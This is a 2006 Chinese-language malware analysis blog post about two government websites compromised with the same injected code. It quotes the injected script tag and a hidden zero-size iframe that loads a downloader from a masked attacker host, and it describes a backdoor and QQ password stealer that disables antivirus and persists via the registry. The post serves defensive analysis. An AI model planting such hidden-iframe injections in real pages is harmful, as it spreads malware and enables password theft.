本文分析了两个政府网站遭受的恶意代码攻击事件。攻击者利用JavaScript脚本下载并执行恶意程序,包括Backdoor.Win32.Hupigon.byq和Trojan-PSW.Win32.QQRob.hf等,这些程序能终止安全软件运行、盗取QQ密码等。
endurer 原创
2006-08-18 第1版
打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。
第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:
--------
<TR><script language=javascript src=bbs.js></script>
<TD vAlign=top align=right width="48%">
--------
bbs.js的内容为:
--------
document.write("<iframe src=hxxp://wzxqy.chao***kuai.com/***1***23/index.htm width=0 height=0></iframe>")
--------
hxxp://wzxqy.chao***kuai.com/***1***23/index.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。
该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://wzxqy.chao***kuai.com/***1***23/123.exe, 保存为 IE临时文件夹中的 winlogin.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫 中第二段脚本程序相似)
123.exe 下载两个文件:
hxxp://wzxqy***01.vip***6.25idc.cn/1***/888.exe (Kaspersky 报为 Backdoor.Win32.Hupigon.byq)
hxxp://wzxqy***01.vip***6.25idc.cn/1***/777.exe (Kaspersky 报为 Trojan-PSW.Win32.QQRob.hf)
777.exe 会:
1、终止瑞星实时监控中心,强行关闭瑞星杀毒软件窗口,删除瑞星在注册表中的开机启动项,如RavTask
2、把自己复制为%windir%/system32/NTdHcP.exe,并运行
3、修改注册表,在 [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下创建键"NTdhcp",其值为:"C:/WINDOWS/System32/NTdhcp.exe"
(endurer注:c:/windows是Windows系统文件夹路径,在不同的电脑中可能不同)
4、终止QQ进程,盗取QQ密码
第二个网站 hxxp://www.hj***.gov.cn的首页末被直接加入代码:
--------
<iframe src="hxxp://wzxqy.chao***kuai.Qcom/***1***23/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
--------
经分析发现两个网站在同一个服务器上,因此被加入同一恶意代码也就不足为奇了。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
